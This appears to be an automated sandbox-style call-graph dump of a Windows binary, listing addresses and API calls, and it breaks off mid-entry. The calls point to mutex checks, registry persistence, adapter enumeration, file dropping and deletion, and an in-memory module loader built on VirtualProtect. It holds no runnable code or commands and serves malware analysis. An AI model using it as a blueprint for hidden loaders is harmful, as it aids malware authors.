11876->11869 11878 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11877->11878 11879 17eb4d 11878->11879 11880 175fd2 11881 175fde ___scrt_is_nonwritable_in_current_image 11880->11881 11904 1757b7 11881->11904 11883 175fe5 11884 176138 11883->11884 11887 17600f 11883->11887 11912 1763dc IsProcessorFeaturePresent 11884->11912 11886 17613f exit 11888 176145 _exit 11886->11888 11889 176013 _initterm_e 11887->11889 11894 17605c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 11887->11894 11890 17603f _initterm 11889->11890 11891 17602e 11889->11891 11890->11894 11892 1760b0 11908 1764f6 memset GetStartupInfoW 11892->11908 11894->11892 11897 1760a8 _register_thread_local_exe_atexit_callback 11894->11897 11896 16bd30 11898 1760ca 11896->11898 11897->11892 11910 17652f GetModuleHandleW 11898->11910 11901 1760d5 11902 1760de ___scrt_uninitialize_crt 11901->11902 11903 1760d9 _cexit 11901->11903 11902->11891 11903->11902 11905 1757c0 11904->11905 11916 175c92 IsProcessorFeaturePresent 11905->11916 11907 1757cc pre_c_initialization 11907->11883 11909 1760b5 _get_wide_winmain_command_line 11908->11909 11909->11896 11911 1760d1 11910->11911 11911->11886 11911->11901 11913 1763f1 ___scrt_fastfail 11912->11913 11914 1763fd memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11913->11914 11915 1764e7 ___scrt_fastfail 11914->11915 11915->11886 11917 175cb8 11916->11917 11917->11907 11918 16f500 11919 175ee0 11918->11919 11920 16f51b GetAdaptersInfo 11919->11920 11922 16f57c 11920->11922 11927 16f59a 11920->11927 11921 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11923 16f5c3 11921->11923 11922->11927 11928 16c3a0 11922->11928 11925 16f605 11926 163450 9 API calls 11925->11926 11926->11927 11927->11921 11931 1755e0 11928->11931 11930 16c3b6 __stdio_common_vsprintf_s 11930->11925 11931->11930 11932 161360 11939 1759a9 11932->11939 11935 161390 WSAStartup InterlockedExchange 11936 1613ab 11935->11936 11937 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11936->11937 11938 1613bf 11937->11938 11942 17596e 11939->11942 11943 175992 _register_onexit_function 11942->11943 11944 17598b _crt_atexit 11942->11944 11945 16137d InterlockedIncrement 11943->11945 11944->11945 11945->11935 11945->11936 11946 16e9a0 11947 163540 9 API calls 11946->11947 11948 16e9f7 11947->11948 12009 16e1b0 11948->12009 11950 16f4d7 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11951 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11950->11951 11952 16f4fa 11951->11952 11953 16eb89 11954 1622d0 6 API calls 11953->11954 11955 16eb98 11954->11955 12025 183ba0 11955->12025 11956 16eb0a atoi 11960 16eb54 11956->11960 11963 16e9fc std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11956->11963 11958 175703 _callnewh malloc _CxxThrowException _CxxThrowException std::_Facet_Register 11958->11963 11959 16eba4 11964 16ebe0 memset memcpy 11959->11964 11960->11950 11962 16eb83 _invalid_parameter_noinfo_noreturn 11960->11962 11961 16ead7 memcpy 11961->11956 11962->11953 11963->11950 11963->11953 11963->11956 11963->11958 11963->11961 11963->11962 11965 16ec27 11964->11965 12034 161fa0 memcpy 11965->12034 11969 16ec8c 12040 164c90 11969->12040 11971 16ecb3 11976 16ed28 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11971->11976 12044 16c360 11971->12044 11975 16ecf8 11975->11976 11977 16ed22 _invalid_parameter_noinfo_noreturn 11975->11977 11978 16eed5 OpenMutexA 11976->11978 11977->11976 11979 16eef3 Sleep 11978->11979 11980 16eeea CloseHandle 11978->11980 11981 16ef04 11979->11981 11980->11981 12059 16bc60 11981->12059 11984 16f413 12087 16b200 11984->12087 11986 16f0b5 12062 16b6c0 11986->12062 11989 16f47d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 11989->11950 11994 16f4d1 _invalid_parameter_noinfo_noreturn 11989->11994 11990 16f0c4 11992 16f0ce 9 API calls 11990->11992 11993 16f408 11990->11993 11991 16f477 _invalid_parameter_noinfo_noreturn 11991->11989 11996 16f2e5 7 API calls 11992->11996 11997 16f17d 11992->11997 12079 16b610 11993->12079 11994->11950 12072 16cab0 11996->12072 11997->11996 12010 182540 17 API calls 12009->12010 12011 16e1e8 12010->12011 12012 183380 12 API calls 12011->12012 12013 16e1f9 12012->12013 12091 1829d0 12013->12091 12016 16e3c9 12018 182670 12 API calls 12016->12018 12020 16e3da 12018->12020 12021 16e40c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12020->12021 12023 16e406 _invalid_parameter_noinfo_noreturn 12020->12023 12022 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12021->12022 12024 16e42e 12022->12024 12023->12021 12024->11963 12026 1622d0 6 API calls 12025->12026 12027 183c04 12026->12027 12028 183d80 128 API calls 12027->12028 12029 183c09 12028->12029 12030 183c38 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12029->12030 12032 183c32 _invalid_parameter_noinfo_noreturn 12029->12032 12031 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12030->12031 12033 183c5a 12031->12033 12032->12030 12033->11959 12035 161fc3 12034->12035 12036 161710 12035->12036 12037 161725 12036->12037 12039 16172e 12036->12039 12037->12039 12129 161870 12037->12129 12039->11969 12041 164ca0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12040->12041 12042 164c99 12040->12042 12041->11971 12043 175703 std::_Facet_Register 4 API calls 12042->12043 12043->12041 12146 174e80 12044->12146 12046 16c373 12047 16c377 memmove 12046->12047 12048 16c38e 12046->12048 12047->12048 12049 164bb0 memset 12048->12049 12050 164c58 12049->12050 12056 164beb 12049->12056 12051 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12050->12051 12053 164c67 12051->12053 12053->11975 12054 164c6d 12057 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12054->12057 12055 164940 15 API calls 12055->12056 12056->12050 12056->12054 12056->12055 12161 188470 12056->12161 12058 164c89 12057->12058 12058->11975 12178 16b800 12059->12178 12061 16bc89 12061->11984 12061->11986 12063 16b7ec SetLastError 12062->12063 12064 16b6e2 12062->12064 12063->11990 12064->12063 12065 16b7ae bsearch 12064->12065 12066 16b729 malloc 12064->12066 12067 16b707 12064->12067 12065->12063 12065->12067 12068 16b765 qsort 12066->12068 12069 16b752 SetLastError 12066->12069 12067->12063 12070 16b7d8 12067->12070 12068->12065 12069->11990 12070->11990 12073 16cabb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12072->12073 12075 16cb47 _invalid_parameter_noinfo_noreturn 12073->12075 12076 16cb19 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12073->12076 12078 176878 ??1Writer@Json@@UAE 12075->12078 12230 166fc0 12076->12230 12077 16cb3f 12077->12078 12080 16b6b7 12079->12080 12081 16b61d free 12079->12081 12080->11984 12083 16b685 GetProcessHeap HeapFree 12081->12083 12086 16b64a free 12081->12086 12083->12080 12086->12083 12088 16b227 12087->12088 12089 16b22c 12087->12089 12090 16b610 4 API calls 12088->12090 12089->11989 12089->11991 12090->12089 12092 182a20 12091->12092 12092->12092 12093 163540 9 API calls 12092->12093 12094 182a39 12093->12094 12095 16c3d0 6 API calls 12094->12095 12096 182a4e 12095->12096 12097 1828a0 16 API calls 12096->12097 12098 182a53 12097->12098 12099 182a63 memmove 12098->12099 12100 182a95 12098->12100 12099->12100 12101 182ad6 RegOpenKeyExW 12100->12101 12102 182aa1 RegCreateKeyExW 12100->12102 12108 182aff 12101->12108 12102->12108 12105 182c56 12106 182c88 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12105->12106 12111 182c82 _invalid_parameter_noinfo_noreturn 12105->12111 12109 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12106->12109 12107 182740 11 API calls 12107->12105 12108->12105 12110 16c3d0 6 API calls 12108->12110 12125 182c36 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12108->12125 12112 16e388 12109->12112 12113 182b2c 12110->12113 12111->12106 12112->12016 12126 183250 12112->12126 12114 1824f0 9 API calls 12113->12114 12115 182b3f 12114->12115 12116 182490 12 API calls 12115->12116 12117 182b51 12116->12117 12118 176890 _invalid_parameter_noinfo_noreturn 12117->12118 12119 182b5d 12118->12119 12120 182b8f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12119->12120 12122 182b89 _invalid_parameter_noinfo_noreturn 12119->12122 12121 182be3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12120->12121 12123 182bdd _invalid_parameter_noinfo_noreturn 12120->12123 12124 182c30 _invalid_parameter_noinfo_noreturn 12121->12124 12121->12125 12122->12120 12123->12121 12124->12125 12125->12107 12127 1827f0 RegQueryValueExW 12126->12127 12128 16e3a0 _time64 12127->12128 12128->12016 12130 161896 12129->12130 12136 161999 12129->12136 12132 1618d6 12130->12132 12133 161937 12130->12133 12134 16189e 12130->12134 12130->12136 12131 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12135 1619e9 12131->12135 12132->12136 12139 1618e8 12132->12139 12133->12136 12137 161949 12133->12137 12134->12136 12138 1618a9 12134->12138 12135->12039 12136->12131 12141 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12137->12141 12142 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12138->12142 12140 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12139->12140 12143 161931 12140->12143 12144 161993 12141->12144 12145 1618d0 12142->12145 12143->12039 12144->12039 12145->12039 12147 174ea2 12146->12147 12148 174eaa 12146->12148 12147->12046 12149 174f14 12148->12149 12150 174eb2 12148->12150 12160 164d00 ?_Xlength_error@std@@YAXPBD 12149->12160 12152 174ef7 12150->12152 12155 175703 std::_Facet_Register 4 API calls 12150->12155 12153 175703 std::_Facet_Register 4 API calls 12152->12153 12156 174efd 12153->12156 12157 174ecb 12155->12157 12156->12046 12158 174ed4 12157->12158 12159 174ef1 _invalid_parameter_noinfo_noreturn 12157->12159 12158->12046 12159->12152 12165 188480 12161->12165 12162 189612 12162->12056 12163 188a5a 12167 188ac2 12163->12167 12168 189f70 12163->12168 12165->12162 12165->12163 12166 188971 memcpy 12165->12166 12166->12165 12167->12056 12169 189f97 12168->12169 12170 189f82 12168->12170 12171 189ff8 memcpy 12169->12171 12172 189fd7 memcpy 12169->12172 12173 189fa3 12169->12173 12177 18be40 malloc 12170->12177 12174 18a016 memcpy 12171->12174 12175 18a038 12171->12175 12172->12167 12173->12167 12174->12167 12175->12167 12177->12169 12179 16b816 12178->12179 12180 16b837 SetLastError 12178->12180 12179->12180 12181 16bc43 SetLastError 12179->12181 12182 16b84a 12179->12182 12180->12061 12181->12061 12182->12181 12183 16b8a3 GetNativeSystemInfo 12182->12183 12183->12181 12187 16b8cc 12183->12187 12184 16b8ff GetProcessHeap HeapAlloc 12185 16b91c 12184->12185 12186 16b93d 12184->12186 12189 16b92a SetLastError 12185->12189 12209 16b3d0 12186->12209 12187->12184 12187->12189 12189->12061 12190 16b991 12191 16bae1 12190->12191 12194 16b9aa memcpy 12190->12194 12192 16b610 4 API calls 12191->12192 12193 16baeb 12192->12193 12193->12061 12198 16baa8 12194->12198 12199 16b9ef 12194->12199 12196 16bad9 SetLastError 12196->12191 12197 16bb7f 12197->12191 12220 16b4b0 12197->12220 12212 16b240 12198->12212 12199->12191 12199->12196 12199->12198 12200 16ba2f memset 12199->12200 12202 16ba6b memcpy 12199->12202 12200->12199 12202->12199 12204 16bb96 12205 16bc06 12204->12205 12206 16bbe9 SetLastError 12204->12206 12205->12061 12207 16b610 4 API calls 12206->12207 12208 16bbfb 12207->12208 12208->12061 12210 16b3db SetLastError 12209->12210 12211 16b3e9 12209->12211 12210->12190 12211->12190 12213 16b3b5 12212->12213 12217 16b265 12212->12217 12213->12197 12214 16b3a4 SetLastError 12214->12197 12215 16b387 SetLastError 12215->12197 12217->12213 12217->12214 12217->12215 12218 16b365 SetLastError 12217->12218 12218->12197 12223 16b4e5 12220->12223 12221 16b400 VirtualProtect 12222 16b5ea 12221->12222 12222->12191 12222->12204 12223->12222 12225 16b5d5 12223->12225 12226 16b400 12223->12226 12225->12221 12227 16b41d 12226->12227 12228 16b412 12226->12228 12227->12223 12228->12227 12229 16b460 VirtualProtect 12228->12229 12229->12227 12231 167053 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12230->12231 12234 166fce std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12230->12234 12231->12077 12232 167076 _invalid_parameter_noinfo_noreturn 12236 1657f0 12232->12236 12234->12231 12234->12232 12235 1670b7 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12235->12077 12237 165803 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12236->12237 12238 16582a 12236->12238 12237->12238 12239 1657f0 _invalid_parameter_noinfo_noreturn 12237->12239 12241 165430 12237->12241 12238->12235 12239->12237 12242 16543b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12241->12242 12243 165498 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12242->12243 12244 1654b7 _invalid_parameter_noinfo_noreturn 12242->12244 12243->12237 12245 171410 12247 17149f 12245->12247 12246 17177d RegOpenKeyExA 12248 1717a6 RegQueryValueExA 12246->12248 12249 171852 12246->12249 12247->12246 12247->12247 12251 1717cf 12248->12251 12252 171849 RegCloseKey 12248->12252 12250 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12249->12250 12253 17188a 12250->12253 12254 1717d9 12251->12254 12260 164220 12251->12260 12252->12249 12255 1717fa RegQueryValueExA 12254->12255 12255->12252 12257 17181d 12255->12257 12258 171828 12257->12258 12259 164220 12 API calls 12257->12259 12258->12252 12259->12252 12261 164242 memset 12260->12261 12262 164271 12260->12262 12261->12255 12263 164280 12262->12263 12264 16437a 12262->12264 12268 163200 5 API calls 12263->12268 12275 1631f0 ?_Xlength_error@std@@YAXPBD 12264->12275 12269 1642c7 12268->12269 12270 1642ee memcpy memset 12269->12270 12271 16434d memcpy memset 12269->12271 12272 16432b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12270->12272 12273 16431b 12270->12273 12271->12255 12272->12255 12273->12272 12274 164347 _invalid_parameter_noinfo_noreturn 12273->12274 12274->12271 12276 1727d0 12277 163540 9 API calls 12276->12277 12278 17282a 12277->12278 12279 16e1b0 47 API calls 12278->12279 12280 17282f 12279->12280 12281 163540 9 API calls 12280->12281 12312 172836 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12280->12312 12282 17286c memset GetEnvironmentVariableW 12281->12282 12284 1728c6 12282->12284 12283 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12285 1733d4 12283->12285 12284->12284 12286 163540 9 API calls 12284->12286 12287 1728e8 12286->12287 12288 1632d0 12 API calls 12287->12288 12289 172a78 12288->12289 12407 184c20 PathIsDirectoryW 12289->12407 12291 172a92 12292 1632d0 12 API calls 12291->12292 12293 172c38 12292->12293 12424 184d00 GetFileAttributesW 12293->12424 12295 172c52 12296 172c76 12295->12296 12297 172c5f DeleteFileW 12295->12297 12298 16c3d0 6 API calls 12296->12298 12297->12296 12299 172c8d 12298->12299 12300 16c3d0 6 API calls 12299->12300 12301 172ca2 12300->12301 12438 183a80 12301->12438 12303 172cab 12304 173317 12303->12304 12305 172cb6 LoadLibraryW 12303->12305 12306 17334f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12304->12306 12311 173349 _invalid_parameter_noinfo_noreturn 12304->12311 12307 173300 DeleteFileW 12305->12307 12308 172cdf GetProcAddress 12305->12308 12306->12312 12313 1733a8 _invalid_parameter_noinfo_noreturn 12306->12313 12307->12304 12309 1732f4 FreeLibrary 12308->12309 12310 172cf9 12308->12310 12309->12307 12453 162360 12310->12453 12311->12306 12312->12283 12313->12312 12316 173510 146 API calls 12317 172d75 12316->12317 12318 1732bf 12317->12318 12321 172d8d 12317->12321 12319 162360 9 API calls 12318->12319 12320 1732d0 12319->12320 12322 173510 146 API calls 12320->12322 12323 162360 9 API calls 12321->12323 12325 1732bd 12322->12325 12324 172dfe 12323->12324 12326 173510 146 API calls 12324->12326 12327 162360 9 API calls 12325->12327 12328 172e05 12326->12328 12329 1732e6 12327->12329 12328->12325 12331 162360 9 API calls 12328->12331 12627 173950 12329->12627 12333 172e21 12331->12333 12457 16de30 12333->12457 12408 184c42 12407->12408 12409 184c56 wcscpy_s lstrlenW 12407->12409 12410 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12408->12410 12411 184c9b PathRemoveFileSpecW 12409->12411 12412 184c7f 12409->12412 12413 184c52 12410->12413 12414 184cbb PathIsDirectoryW 12411->12414 12415 184cac 12411->12415 12412->12411 12413->12291 12417 184cdb CreateDirectoryW 12414->12417 12418 184ccc 12414->12418 12416 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12415->12416 12419 184cb7 12416->12419 12421 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12417->12421 12420 184c20 5 API calls 12418->12420 12419->12291 12423 184cd8 12420->12423 12422 184cef 12421->12422 12422->12291 12423->12417 12425 184d3a GetLastError 12424->12425 12426 184d23 12424->12426 12428 184d8d 12425->12428 12429 184d45 12425->12429 12427 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12426->12427 12431 184d36 12427->12431 12430 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12428->12430 12429->12428 12433 184d4f FindFirstFileW 12429->12433 12432 184d9a 12430->12432 12431->12295 12432->12295 12433->12428 12434 184d62 FindClose 12433->12434 12434->12428 12435 184d79 12434->12435 12436 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12435->12436 12437 184d89 12436->12437 12437->12295 12439 16c3d0 6 API calls 12438->12439 12440 183ac4 12439->12440 12441 184650 13 API calls 12440->12441 12442 183aca 12441->12442 12443 16c3d0 6 API calls 12442->12443 12444 183ae1 12443->12444 12445 184770 13 API calls 12444->12445 12446 183ae7 12445->12446 12643 183840 12446->12643 12449 183b2a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12450 183b7a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12449->12450 12452 183b74 _invalid_parameter_noinfo_noreturn 12449->12452 12450->12303 12451 183b24 _invalid_parameter_noinfo_noreturn 12451->12449 12452->12450 12454 162382 12453->12454 12454->12454 12455 163540 9 API calls 12454->12455 12456 16239a 12455->12456 12456->12316 12458 182540 17 API calls 12457->12458 12459 16de68 12458->12459 12460 183380 12 API calls 12459->12460 12461 16de79 12460->12461 12462 1829d0 36 API calls 12461->12462 12463 16e008 12462->12463 12464 16e020 12463->12464 12465 183250 RegQueryValueExW 12463->12465 12466 182670 12 API calls 12464->12466 12465->12464 12467 16e035 12466->12467 12468 16e067 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12467->12468 12470 16e061 _invalid_parameter_noinfo_noreturn 12467->12470 12469 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12468->12469 12471 16e089 12469->12471 12470->12468 12471->12325 12472 1706c0 ??0Value@Json@@QAE@W4ValueType@1@ 12471->12472 12473 16c3d0 6 API calls 12472->12473 12474 170745 12473->12474 12475 184650 13 API calls 12474->12475 12476 17074e ??0Value@Json@@QAE@PBD ??AValue@Json@@QAEAAV01@PBD ??4Value@Json@@QAEAAV01@$$QAV01@ ??1Value@Json@@QAE 12475->12476 12478 170799 12476->12478 12479 1707bd std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12476->12479 12478->12479 12481 1707b7 _invalid_parameter_noinfo_noreturn 12478->12481 12480 16c3d0 6 API calls 12479->12480 12482 1707d2 12480->12482 12481->12479 12483 184650 13 API calls 12482->12483 12484 1707db ??0Value@Json@@QAE@PBD ??AValue@Json@@QAEAAV01@PBD ??4Value@Json@@QAEAAV01@$$QAV01@ ??1Value@Json@@QAE 12483->12484 12486 170826 12484->12486 12488 17084a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12484->12488 12486->12488 12490 170844 _invalid_parameter_noinfo_noreturn 12486->12490 12487 16c3d0 6 API calls 12489 170862 12487->12489 12488->12487 12491 184650 13 API calls 12489->12491 12490->12488 12492 17086b ??0Value@Json@@QAE@PBD ??AValue@Json@@QAEAAV01@PBD ??4Value@Json@@QAEAAV01@$$QAV01@ ??1Value@Json@@QAE 12491->12492 12494 1708b6 12492->12494 12495 1708e4 ??0StyledWriter@Json@@QAE ?write@StyledWriter@Json@@UAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVValue@2@ 12492->12495 12497 1708da std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12494->12497 12498 1708d4 _invalid_parameter_noinfo_noreturn 12494->12498 12673 164600 malloc 12495->12673 12497->12495 12498->12497 12499 17091b 12674 164640 12499->12674 12628 182540 17 API calls 12627->12628 12629 173988 12628->12629 12630 183380 12 API calls 12629->12630 12631 173999 12630->12631 12632 1829d0 36 API calls 12631->12632 12633 173b28 12632->12633 12634 173b61 12633->12634 12635 173b2c _time64 12633->12635 12637 182670 12 API calls 12634->12637 12636 1833e0 RegSetValueExW 12635->12636 12636->12634 12638 173b69 12637->12638 12639 173b9b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12638->12639 12641 173b95 _invalid_parameter_noinfo_noreturn 12638->12641 12640 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12639->12640 12642 1732eb 12640->12642 12641->12639 12642->12309 12644 183540 4 API calls 12643->12644 12645 183881 12644->12645 12646 185d80 43 API calls 12645->12646 12647 1838a5 12646->12647 12648 183923 12647->12648 12650 186400 _invalid_parameter_noinfo_noreturn 12647->12650 12649 183690 3 API calls 12648->12649 12652 1839dc 12649->12652 12651 1838b8 12650->12651 12653 186500 85 API calls 12651->12653 12654 183a08 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12652->12654 12660 183a02 _invalid_parameter_noinfo_noreturn 12652->12660 12655 1838dc 12653->12655 12656 183a50 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 12654->12656 12661 183a4a _invalid_parameter_noinfo_noreturn 12654->12661 12657 1838e4 fopen_s 12655->12657 12658 1839c6 12655->12658 12659 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12656->12659 12663 183928 memset 12657->12663 12664 183918 12657->12664 12662 185d50 3 API calls 12658->12662 12665 183a73 12659->12665 12660->12654 12661->12656 12662->12648 12667 186ef0 3 API calls 12663->12667 12666 185d50 3 API calls 12664->12666 12665->12449 12665->12451 12666->12648 12672 183968 12667->12672 12668 1839b7 fclose 12668->12658 12669 18397c fwrite 12671 186ef0 3 API calls 12669->12671 12670 1839b3 12670->12668 12671->12672 12672->12668 12672->12669 12672->12670 12673->12499 12727 1755e6 12674->12727 13278 175fc0 13282 176572 SetUnhandledExceptionFilter 13278->13282 13280 175fc5 pre_c_initialization 13281 175fca _set_new_mode 13280->13281 13282->13280 13283 1759be 13294 175a02 InitializeCriticalSectionAndSpinCount GetModuleHandleW 13283->13294 13285 1759c3 13305 1757f0 13285->13305 13287 1759ca 13288 1759cf 13287->13288 13289 1759dd 13287->13289 13290 1759a9 pre_c_initialization 2 API calls 13288->13290 13291 1763dc ___scrt_fastfail 6 API calls 13289->13291 13292 1759d9 13290->13292 13293 1759e4 13291->13293 13295 175a5d GetProcAddress GetProcAddress GetProcAddress 13294->13295 13296 175a48 GetModuleHandleW 13294->13296 13298 175ac3 CreateEventW 13295->13298 13299 175a8b 13295->13299 13296->13295 13297 175ae9 13296->13297 13301 1763dc ___scrt_fastfail 6 API calls 13297->13301 13298->13297 13300 175a93 __crt_fast_encode_pointer 13298->13300 13299->13298 13299->13300 13300->13285 13302 175af0 DeleteCriticalSection 13301->13302 13303 175b05 CloseHandle 13302->13303 13304 175b0c 13302->13304 13303->13304 13304->13285 13306 175803 13305->13306 13307 1757ff 13305->13307 13308 17588d 13306->13308 13310 175810 ___scrt_release_startup_lock 13306->13310 13307->13287 13309 1763dc ___scrt_fastfail 6 API calls 13308->13309 13311 175894 13309->13311 13312 17581d _initialize_onexit_table 13310->13312 13314 17583b 13310->13314 13313 17582c _initialize_onexit_table 13312->13313 13312->13314 13313->13314 13314->13287 13315 16bd8d 13316 16bd98 13315->13316 13317 163540 9 API calls 13316->13317 13318 16bedf 13317->13318 13325 17ffa0 OpenMutexW 13318->13325 13320 16bee4 13321 181b20 86 API calls 13320->13321 13322 16bef5 13321->13322 13323 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13322->13323 13324 16bf07 13323->13324 13326 17ffc5 CreateMutexW 13325->13326 13328 17ffc1 13325->13328 13326->13328 13327 180012 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13327->13320 13328->13327 13329 18000c _invalid_parameter_noinfo_noreturn 13328->13329 13329->13327 13330 171b88 13331 171bb0 13330->13331 13332 171b9b 13330->13332 13334 1661b0 12 API calls 13331->13334 13333 167960 23 API calls 13332->13333 13337 171bae 13333->13337 13334->13337 13335 171c27 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13336 171c73 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13335->13336 13340 171c6d _invalid_parameter_noinfo_noreturn 13335->13340 13398 16a0b0 13336->13398 13337->13335 13339 171c21 _invalid_parameter_noinfo_noreturn 13337->13339 13339->13335 13340->13336 13344 171cc5 13345 171d1a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13344->13345 13348 171d14 _invalid_parameter_noinfo_noreturn 13344->13348 13347 182540 17 API calls 13345->13347 13346 163190 _invalid_parameter_noinfo_noreturn 13346->13344 13349 171d2f 13347->13349 13348->13345 13350 183380 12 API calls 13349->13350 13351 171d43 13350->13351 13352 1829d0 36 API calls 13351->13352 13353 171ed1 13352->13353 13354 183280 14 API calls 13353->13354 13355 17204d 13354->13355 13356 172063 13355->13356 13357 163190 _invalid_parameter_noinfo_noreturn 13355->13357 13358 1720b9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13356->13358 13359 1720b3 _invalid_parameter_noinfo_noreturn 13356->13359 13357->13356 13360 183280 14 API calls 13358->13360 13359->13358 13361 17223d 13360->13361 13362 17224d 13361->13362 13363 163190 _invalid_parameter_noinfo_noreturn 13361->13363 13364 1722a3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13362->13364 13365 17229d _invalid_parameter_noinfo_noreturn 13362->13365 13363->13362 13366 183280 14 API calls 13364->13366 13365->13364 13367 172421 13366->13367 13368 172431 13367->13368 13369 163190 _invalid_parameter_noinfo_noreturn 13367->13369 13370 172487 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13368->13370 13371 172481 _invalid_parameter_noinfo_noreturn 13368->13371 13369->13368 13372 183280 14 API calls 13370->13372 13371->13370 13373 17260d 13372->13373 13374 17261d 13373->13374 13376 163190 _invalid_parameter_noinfo_noreturn 13373->13376 13375 172673 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13374->13375 13378 17266d _invalid_parameter_noinfo_noreturn 13374->13378 13414 1718a0 13375->13414 13376->13374 13378->13375 13380 175480 13 API calls 13381 1726be 13380->13381 13382 1726d1 13381->13382 13383 163190 _invalid_parameter_noinfo_noreturn 13381->13383 13384 17272a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13382->13384 13386 172724 _invalid_parameter_noinfo_noreturn 13382->13386 13383->13382 13385 172746 13384->13385 13424 16e440 13384->13424 13440 16cb90 13385->13440 13386->13384 13389 172750 13512 16f680 ??0Value@Json@@QAE@W4ValueType@1@ 13389->13512 13392 182670 12 API calls 13393 172774 13392->13393 13394 1727a0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13393->13394 13396 17279a _invalid_parameter_noinfo_noreturn 13393->13396 13395 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13394->13395 13397 1727c1 13395->13397 13396->13394 13604 16b130 13398->13604 13400 16a0ee 13401 16a100 13400->13401 13616 16a7b0 13401->13616 13406 16a8a0 10 API calls 13407 16a18c 13406->13407 13644 169f00 13407->13644 13410 16a1e9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13411 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13410->13411 13413 16a20c 13411->13413 13412 16a1e3 _invalid_parameter_noinfo_noreturn 13412->13410 13413->13344 13413->13346 13415 1718f2 13414->13415 13416 17191e LoadLibraryW 13414->13416 13415->13416 13417 171932 GetProcAddress 13416->13417 13418 171aee 13416->13418 13422 171ae7 FreeLibrary 13417->13422 13423 171add 13417->13423 13419 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13418->13419 13421 171afa 13419->13421 13421->13380 13422->13418 13423->13422 13425 16e4cc 13424->13425 13425->13425 13426 16e5fd LoadLibraryW 13425->13426 13427 16e61a GetProcAddress 13426->13427 13428 16e97b 13426->13428 13432 16e7f6 memset 13427->13432 13433 16e96f FreeLibrary 13427->13433 13429 